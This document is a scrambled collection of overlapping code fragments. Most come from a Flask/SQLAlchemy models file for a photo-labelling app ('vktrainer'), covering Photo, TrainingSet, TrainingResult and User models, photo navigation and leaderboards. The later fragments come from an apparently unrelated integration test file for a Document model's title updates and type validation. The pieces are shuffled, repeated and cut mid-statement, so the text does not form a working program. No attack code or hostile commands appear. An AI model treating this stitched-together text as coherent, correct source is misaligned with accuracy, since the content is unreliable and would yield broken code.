lazy='dynamic')) def __str__(self): return", "class Photo(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) picture = db.Column(db.String(128)) md5", "primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id'))", "= json.loads(self.result) except ValueError: # Could not decode JSON loaded_result = None if", "'state': 'OK', 'value': loaded_result, } else: result = { 'state': 'KO', 'value': {},", "import REF_TO_PATTERN_CLASS try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError: raise KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class TrainingResult(db.Model):", "backref=db.backref('training_results', lazy='dynamic')) photo = db.relation('Photo') user = db.relation('User', lazy='joined', backref=db.backref('training_results')) result = db.Column(db.Text)", "return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) photos", "sqlalchemy import func, desc # from vktrainer import db, app, login_manager from vktrainer", "def _get_previous_photo_linear(self, photo): previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first() if not previous_photo: # We", "photo.id) nb_photos_without_results = photos_without_results.count() if nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)] else: nb_photos", "previous_photo: # We are already at the first photo, we show the last", "a random photo without any results If there aren't any, we serve a", "secondary=photos, backref=db.backref('training_sets', lazy='dynamic')) def __str__(self): return self.name def get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id) def", "not next_photo: # We are already at the last photo, we show the", "file, check_if_exists=True): # We check no photo with the same md5 already exists", "db.Column(db.String(128)) md5 = db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/' @classmethod def create_from_file(cls, file, check_if_exists=True): #", "md5 already exists in db md5 = get_md5(file) if check_if_exists: photo = cls.query.filter_by(md5=md5).first()", "# from vktrainer import db, app, login_manager from vktrainer import db, login_manager from", "photo, we show the first one next_photo = self.photos.order_by('id').first() return next_photo def _get_previous_photo_linear(self,", "return next_photo def _get_previous_photo_linear(self, photo): previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first() if not previous_photo:", "if photo: photos_without_results = photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results = photos_without_results.count() if nb_photos_without_results: return", "= { 'state': 'OK', 'value': loaded_result, } else: result = { 'state': 'KO',", "def create_from_file(cls, file, check_if_exists=True): # We check no photo with the same md5", "md5=md5, picture=path) db.session.add(photo) db.session.commit() return photo def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self):", "return None class TrainingPattern(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) name", "raise KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer,", "db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic')) photo = db.relation('Photo') user = db.relation('User',", "aren't any, we serve a random photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) ))", "pattern_ref = db.Column(db.String(64)) position = db.Column(db.Integer) @property def pattern(self): from .patterns import REF_TO_PATTERN_CLASS", "db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position = db.Column(db.Integer) @property", "pk=self.id) class TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) photos = db.dynamic_loader(", "-*- import json import os import random from shutil import copyfile from flask", "UX) return None class TrainingPattern(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id'))", "first one next_photo = self.photos.order_by('id').first() return next_photo def _get_previous_photo_linear(self, photo): previous_photo = self.photos.filter(Photo.id", "get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id) def get_results(self): return [tr.get_pretty_result() for tr in self.training_results.all()] def", "'pictures/' @classmethod def create_from_file(cls, file, check_if_exists=True): # We check no photo with the", "= db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) photos = db.dynamic_loader( 'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic'))", "os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path) name, _ = os.path.splitext(filename) photo", "photo.id).order_by('id').first() if not next_photo: # We are already at the last photo, we", "__str__(self): return self.name def get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id)", "os import random from shutil import copyfile from flask import url_for, current_app as", "self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo)", "db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) def __repr__(self): return self.name @classmethod", "JSON photo_is_incorrect = db.Column(db.Boolean, default=False) def get_absolute_url(self): return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, )", "from vktrainer.utils import get_md5 photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id'))", ").count() nb_photos = self.photos.count() return float(nb_photos_with_results) / nb_photos * 100 def get_first_photo(self): if", "db.Column(db.Boolean, default=False) def get_absolute_url(self): return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self): if", "= get_md5(file) if check_if_exists: photo = cls.query.filter_by(md5=md5).first() if photo is not None: return", "from vktrainer import db, login_manager from vktrainer.utils import get_md5 photos = db.Table('training_set_photos', db.Column('training_set_id',", "vktrainer.utils import get_md5 photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) )", "= db.Column(db.String(64)) photos = db.dynamic_loader( 'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic')) def __str__(self): return self.name", "training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set", "photo): next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first() if not next_photo: # We are already", "mode (breaks UX) return None class TrainingPattern(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id =", "result = 'Photo marked as incorrect' else: try: loaded_result = json.loads(self.result) except ValueError:", "= self.photos.filter(Photo.id > photo.id).order_by('id').first() if not next_photo: # We are already at the", "@property def pattern(self): from .patterns import REF_TO_PATTERN_CLASS try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError: raise", "decode JSON loaded_result = None if loaded_result: result = { 'state': 'OK', 'value':", "name).first() if not user: user = cls(name=name) db.session.add(user) db.session.commit() return user, True return", "for tr in self.training_results.all()] def get_leaderboard(self): count = func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user, ).add_column(", "_get_previous_photo_linear(self, photo): previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first() if not previous_photo: # We are", "else: nb_photos = self.photos.count() random_nb = random.randint(0, nb_photos - 1) return self.photos.all()[random_nb] def", "photo): # Don't want to allow previous photo in semi random mode (breaks", "from vktrainer import db, app, login_manager from vktrainer import db, login_manager from vktrainer.utils", "if not previous_photo: # We are already at the first photo, we show", "except ValueError: # Could not decode JSON loaded_result = None if loaded_result: result", "want to allow previous photo in semi random mode (breaks UX) return None", "random photo without any results If there aren't any, we serve a random", "= db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic')) photo = db.relation('Photo') user = db.relation('User', lazy='joined', backref=db.backref('training_results')) result" ]
[ "Believing in a prayer bead is a mere act of faith, please don't", "<NAME> and contributors. # mc3 is open-source software under the MIT license (see", "prayer-bead method to estimate parameter uncertainties. Parameters ---------- data: 1D float ndarray A", "Number of prayer-bead shifts. If nprays=0, set to the number of data points.", "Copyright (c) 2015-2021 <NAME> and contributors. # mc3 is open-source software under the", "parameter uncertainties. Parameters ---------- data: 1D float ndarray A time-series dataset. nprays: Integer", "mere act of faith, please don't do that, we are scientists for god's", "prayer beads is a mere act of faith, please don't use it\" \"\\nfor", "is a mere act of faith, please don't do that, we are scientists", "A time-series dataset. nprays: Integer Number of prayer-bead shifts. If nprays=0, set to", "of faith, please don't do that, we are scientists for god's sake! \"\"\"", "scientists for god's sake! \"\"\" print( \"Believing in prayer beads is a mere", "mc3 is open-source software under the MIT license (see LICENSE). __all__ = [", "a mere act of faith, please don't do that, we are scientists for", "prayer-bead shifts. If nprays=0, set to the number of data points. Notes -----", "Implement a prayer-bead method to estimate parameter uncertainties. Parameters ---------- data: 1D float", "the number of data points. Notes ----- Believing in a prayer bead is", "# Copyright (c) 2015-2021 <NAME> and contributors. # mc3 is open-source software under", "shifts. If nprays=0, set to the number of data points. Notes ----- Believing", "number of data points. Notes ----- Believing in a prayer bead is a", "[ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead method to estimate", "a prayer-bead method to estimate parameter uncertainties. Parameters ---------- data: 1D float ndarray", "act of faith, please don't use it\" \"\\nfor published articles (see Cubillos et", "(see LICENSE). __all__ = [ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\" Implement a", "sake! \"\"\" print( \"Believing in prayer beads is a mere act of faith,", "print( \"Believing in prayer beads is a mere act of faith, please don't", "If nprays=0, set to the number of data points. Notes ----- Believing in", "data points. Notes ----- Believing in a prayer bead is a mere act", "] def prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead method to estimate parameter uncertainties.", "don't use it\" \"\\nfor published articles (see Cubillos et al. 2017, AJ, 153).\")", "in prayer beads is a mere act of faith, please don't use it\"", "we are scientists for god's sake! \"\"\" print( \"Believing in prayer beads is", "that, we are scientists for god's sake! \"\"\" print( \"Believing in prayer beads", "use it\" \"\\nfor published articles (see Cubillos et al. 2017, AJ, 153).\") return", "of faith, please don't use it\" \"\\nfor published articles (see Cubillos et al.", "\"Believing in prayer beads is a mere act of faith, please don't use", "contributors. # mc3 is open-source software under the MIT license (see LICENSE). __all__", "---------- data: 1D float ndarray A time-series dataset. nprays: Integer Number of prayer-bead", "dataset. nprays: Integer Number of prayer-bead shifts. If nprays=0, set to the number", "Integer Number of prayer-bead shifts. If nprays=0, set to the number of data", "and contributors. # mc3 is open-source software under the MIT license (see LICENSE).", "to estimate parameter uncertainties. Parameters ---------- data: 1D float ndarray A time-series dataset.", "LICENSE). __all__ = [ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead", "please don't use it\" \"\\nfor published articles (see Cubillos et al. 2017, AJ,", "prayer bead is a mere act of faith, please don't do that, we", "in a prayer bead is a mere act of faith, please don't do", "Parameters ---------- data: 1D float ndarray A time-series dataset. nprays: Integer Number of", "float ndarray A time-series dataset. nprays: Integer Number of prayer-bead shifts. If nprays=0,", "under the MIT license (see LICENSE). __all__ = [ \"prayer_beads\", ] def prayer_beads(data=None,", "points. Notes ----- Believing in a prayer bead is a mere act of", "\"\"\" Implement a prayer-bead method to estimate parameter uncertainties. Parameters ---------- data: 1D", "nprays=0): \"\"\" Implement a prayer-bead method to estimate parameter uncertainties. Parameters ---------- data:", "license (see LICENSE). __all__ = [ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\" Implement", "<reponame>alulujasmine/mc3 # Copyright (c) 2015-2021 <NAME> and contributors. # mc3 is open-source software", "please don't do that, we are scientists for god's sake! \"\"\" print( \"Believing", "def prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead method to estimate parameter uncertainties. Parameters", "2015-2021 <NAME> and contributors. # mc3 is open-source software under the MIT license", "MIT license (see LICENSE). __all__ = [ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\"", "\"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead method to estimate parameter", "of prayer-bead shifts. If nprays=0, set to the number of data points. Notes", "mere act of faith, please don't use it\" \"\\nfor published articles (see Cubillos", "open-source software under the MIT license (see LICENSE). __all__ = [ \"prayer_beads\", ]", "nprays=0, set to the number of data points. Notes ----- Believing in a", "(c) 2015-2021 <NAME> and contributors. # mc3 is open-source software under the MIT", "are scientists for god's sake! \"\"\" print( \"Believing in prayer beads is a", "it\" \"\\nfor published articles (see Cubillos et al. 2017, AJ, 153).\") return None", "\"\"\" print( \"Believing in prayer beads is a mere act of faith, please", "nprays: Integer Number of prayer-bead shifts. If nprays=0, set to the number of", "method to estimate parameter uncertainties. Parameters ---------- data: 1D float ndarray A time-series", "# mc3 is open-source software under the MIT license (see LICENSE). __all__ =", "__all__ = [ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead method", "1D float ndarray A time-series dataset. nprays: Integer Number of prayer-bead shifts. If", "data: 1D float ndarray A time-series dataset. nprays: Integer Number of prayer-bead shifts.", "a prayer bead is a mere act of faith, please don't do that,", "software under the MIT license (see LICENSE). __all__ = [ \"prayer_beads\", ] def", "act of faith, please don't do that, we are scientists for god's sake!", "uncertainties. Parameters ---------- data: 1D float ndarray A time-series dataset. nprays: Integer Number", "god's sake! \"\"\" print( \"Believing in prayer beads is a mere act of", "of data points. Notes ----- Believing in a prayer bead is a mere", "Notes ----- Believing in a prayer bead is a mere act of faith,", "for god's sake! \"\"\" print( \"Believing in prayer beads is a mere act", "prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead method to estimate parameter uncertainties. Parameters ----------", "faith, please don't do that, we are scientists for god's sake! \"\"\" print(", "don't do that, we are scientists for god's sake! \"\"\" print( \"Believing in", "a mere act of faith, please don't use it\" \"\\nfor published articles (see", "do that, we are scientists for god's sake! \"\"\" print( \"Believing in prayer", "= [ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead method to", "to the number of data points. Notes ----- Believing in a prayer bead", "is open-source software under the MIT license (see LICENSE). __all__ = [ \"prayer_beads\",", "time-series dataset. nprays: Integer Number of prayer-bead shifts. If nprays=0, set to the", "set to the number of data points. Notes ----- Believing in a prayer", "the MIT license (see LICENSE). __all__ = [ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0):", "estimate parameter uncertainties. Parameters ---------- data: 1D float ndarray A time-series dataset. nprays:", "faith, please don't use it\" \"\\nfor published articles (see Cubillos et al. 2017,", "bead is a mere act of faith, please don't do that, we are", "----- Believing in a prayer bead is a mere act of faith, please", "is a mere act of faith, please don't use it\" \"\\nfor published articles", "beads is a mere act of faith, please don't use it\" \"\\nfor published", "ndarray A time-series dataset. nprays: Integer Number of prayer-bead shifts. If nprays=0, set" ]
[ "* from ._const_arpa_lm import * from ._kaldi_rnnlm import * __all__ = [name for", "ArpaParseOptions from ._arpa_lm_compiler import * from ._const_arpa_lm import * from ._kaldi_rnnlm import *", "import * __all__ = [name for name in dir() if name[0] != '_'", "import * from ._const_arpa_lm import * from ._kaldi_rnnlm import * __all__ = [name", "* __all__ = [name for name in dir() if name[0] != '_' and", "import * from ._kaldi_rnnlm import * __all__ = [name for name in dir()", "._kaldi_rnnlm import * __all__ = [name for name in dir() if name[0] !=", "._arpa_lm_compiler import * from ._const_arpa_lm import * from ._kaldi_rnnlm import * __all__ =", "._arpa_file_parser import ArpaParseOptions from ._arpa_lm_compiler import * from ._const_arpa_lm import * from ._kaldi_rnnlm", "._const_arpa_lm import * from ._kaldi_rnnlm import * __all__ = [name for name in", "from ._kaldi_rnnlm import * __all__ = [name for name in dir() if name[0]", "from ._arpa_file_parser import ArpaParseOptions from ._arpa_lm_compiler import * from ._const_arpa_lm import * from", "= [name for name in dir() if name[0] != '_' and not name.endswith('Base')]", "* from ._kaldi_rnnlm import * __all__ = [name for name in dir() if", "from ._const_arpa_lm import * from ._kaldi_rnnlm import * __all__ = [name for name", "from ._arpa_lm_compiler import * from ._const_arpa_lm import * from ._kaldi_rnnlm import * __all__", "import ArpaParseOptions from ._arpa_lm_compiler import * from ._const_arpa_lm import * from ._kaldi_rnnlm import", "__all__ = [name for name in dir() if name[0] != '_' and not" ]
[ "floor(n2): print('O primeiro número é maior que o segundo!') elif floor(n1) < floor(n2):", "elif floor(n1) < floor(n2): print('O segundo número é maior que o primeiro') else:", "que o segundo!') elif floor(n1) < floor(n2): print('O segundo número é maior que", "número inteiro:')) n2 = float(input('Digite outro número inteiro:')) if floor(n1) > floor(n2): print('O", "número é maior que o segundo!') elif floor(n1) < floor(n2): print('O segundo número", "= float(input('Digite outro número inteiro:')) if floor(n1) > floor(n2): print('O primeiro número é", "o segundo!') elif floor(n1) < floor(n2): print('O segundo número é maior que o", "floor(n1) < floor(n2): print('O segundo número é maior que o primeiro') else: print('Os", "float(input('Digite um número inteiro:')) n2 = float(input('Digite outro número inteiro:')) if floor(n1) >", "<filename>Python/CeV/Exercicios/ex38.py<gh_stars>0 from math import floor n1 = float(input('Digite um número inteiro:')) n2 =", "import floor n1 = float(input('Digite um número inteiro:')) n2 = float(input('Digite outro número", "print('O primeiro número é maior que o segundo!') elif floor(n1) < floor(n2): print('O", "floor(n1) > floor(n2): print('O primeiro número é maior que o segundo!') elif floor(n1)", "if floor(n1) > floor(n2): print('O primeiro número é maior que o segundo!') elif", "math import floor n1 = float(input('Digite um número inteiro:')) n2 = float(input('Digite outro", "from math import floor n1 = float(input('Digite um número inteiro:')) n2 = float(input('Digite", "inteiro:')) if floor(n1) > floor(n2): print('O primeiro número é maior que o segundo!')", "segundo!') elif floor(n1) < floor(n2): print('O segundo número é maior que o primeiro')", "segundo número é maior que o primeiro') else: print('Os dois números são iguais!')", "primeiro número é maior que o segundo!') elif floor(n1) < floor(n2): print('O segundo", "um número inteiro:')) n2 = float(input('Digite outro número inteiro:')) if floor(n1) > floor(n2):", "inteiro:')) n2 = float(input('Digite outro número inteiro:')) if floor(n1) > floor(n2): print('O primeiro", "número inteiro:')) if floor(n1) > floor(n2): print('O primeiro número é maior que o", "é maior que o segundo!') elif floor(n1) < floor(n2): print('O segundo número é", "n2 = float(input('Digite outro número inteiro:')) if floor(n1) > floor(n2): print('O primeiro número", "print('O segundo número é maior que o primeiro') else: print('Os dois números são", "n1 = float(input('Digite um número inteiro:')) n2 = float(input('Digite outro número inteiro:')) if", "outro número inteiro:')) if floor(n1) > floor(n2): print('O primeiro número é maior que", "< floor(n2): print('O segundo número é maior que o primeiro') else: print('Os dois", "float(input('Digite outro número inteiro:')) if floor(n1) > floor(n2): print('O primeiro número é maior", "floor(n2): print('O segundo número é maior que o primeiro') else: print('Os dois números", "floor n1 = float(input('Digite um número inteiro:')) n2 = float(input('Digite outro número inteiro:'))", "= float(input('Digite um número inteiro:')) n2 = float(input('Digite outro número inteiro:')) if floor(n1)", "> floor(n2): print('O primeiro número é maior que o segundo!') elif floor(n1) <", "maior que o segundo!') elif floor(n1) < floor(n2): print('O segundo número é maior" ]
[ "input() Ng,Nm = map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm):", "i in range(int(input())): input() Ng,Nm = map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while", "g.sort() m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if", "map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1", "m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1", "in range(int(input())): input() Ng,Nm = map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng", "if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if (gg==Ng): print(\"MechaGodzilla\") elif (mm==Nm): print(\"Godzilla\") else: print(\"uncertain\")", "g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else:", "gg,mm=0,0 while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if (gg==Ng): print(\"MechaGodzilla\")", "while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if (gg==Ng): print(\"MechaGodzilla\") elif", "and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if (gg==Ng): print(\"MechaGodzilla\") elif (mm==Nm): print(\"Godzilla\")", "mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if (gg==Ng): print(\"MechaGodzilla\") elif (mm==Nm): print(\"Godzilla\") else:", "for i in range(int(input())): input() Ng,Nm = map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0", "m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if (gg==Ng):", "Ng,Nm = map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm): if", "= map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]):", "range(int(input())): input() Ng,Nm = map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng and", "(gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if (gg==Ng): print(\"MechaGodzilla\") elif (mm==Nm):" ]
[]
[]
[ "= doc_type or all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter(", "with sent type.\"\"\" data = { \"title\": \"test_title\", \"link\": \"test_link\", } if doc_type", "resp, doc = self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type", "= all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document,", "# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests for Document\"\"\" from ggrc.models", "# pylint: disable=invalid-name def setUp(self): super(TestDocument, self).setUp() self.api = Api() self.gen = generator.ObjectGenerator()", "{ \"title\": \"test_title\", \"link\": \"test_link\", } if doc_type is not None: data[\"document_type\"] =", "<see LICENSE file> \"\"\"Integration tests for Document\"\"\" from ggrc.models import all_models from integration.ggrc", "obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type. ' 'Expected options are `URL`, `EVIDENCE`,", "def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def", "doc_type or all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id", "\"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test", "{\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent type.\"\"\"", "self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all()", "if doc_type is not None: data[\"document_type\"] = doc_type doc_type = doc_type or all_models.Document.URL", "title.\"\"\" create_title = \"test_title\" update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title) response = self.api.put(document,", "all_models.Document.document_type == doc_type, ).all() ) return (resp, doc) def test_create_url(self): \"\"\"Test create url.\"\"\"", "(resp, doc) def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\"", "self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type.", "data[\"document_type\"] = doc_type doc_type = doc_type or all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document,", "3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular obj =", "self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type. ' 'Expected options are `URL`,", "= all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid", "= { \"title\": \"test_title\", \"link\": \"test_link\", } if doc_type is not None: data[\"document_type\"]", "TestCase from integration.ggrc.api_helper import Api from integration.ggrc import generator from integration.ggrc.models import factories", "self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT)", "class TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint: disable=invalid-name def setUp(self): super(TestDocument, self).setUp() self.api", "\"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test", "import Api from integration.ggrc import generator from integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document", "update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title,", "\"\"\"Document test cases\"\"\" # pylint: disable=invalid-name def setUp(self): super(TestDocument, self).setUp() self.api = Api()", "test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self):", "\"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular obj", "doc_type is not None: data[\"document_type\"] = doc_type doc_type = doc_type or all_models.Document.URL resp,", "test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data = {", "all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() ) return (resp, doc) def test_create_url(self):", "integration.ggrc import TestCase from integration.ggrc.api_helper import Api from integration.ggrc import generator from integration.ggrc.models", "all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() ) return (resp, doc) def", "or all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id ==", "test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self):", "Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests for Document\"\"\"", "from ggrc.models import all_models from integration.ggrc import TestCase from integration.ggrc.api_helper import Api from", "data = { \"title\": \"test_title\", \"link\": \"test_link\", } if doc_type is not None:", "\"title\": \"test_title\", \"link\": \"test_link\", } if doc_type is not None: data[\"document_type\"] = doc_type", "= generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document title.\"\"\" create_title = \"test_title\" update_title =", "self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent type.\"\"\" data =", "== doc_type, ).all() ) return (resp, doc) def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL)", "doc_type doc_type = doc_type or all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document, data )", ") return (resp, doc) def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test", "def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def", "2017 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests for", "ggrc.models import all_models from integration.ggrc import TestCase from integration.ggrc.api_helper import Api from integration.ggrc", "\"test_title\" update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title}) self.assert200(response)", "\"\"\"Create docuemtn with sent type.\"\"\" data = { \"title\": \"test_title\", \"link\": \"test_link\", }", "\"test_link\", \"owners\": 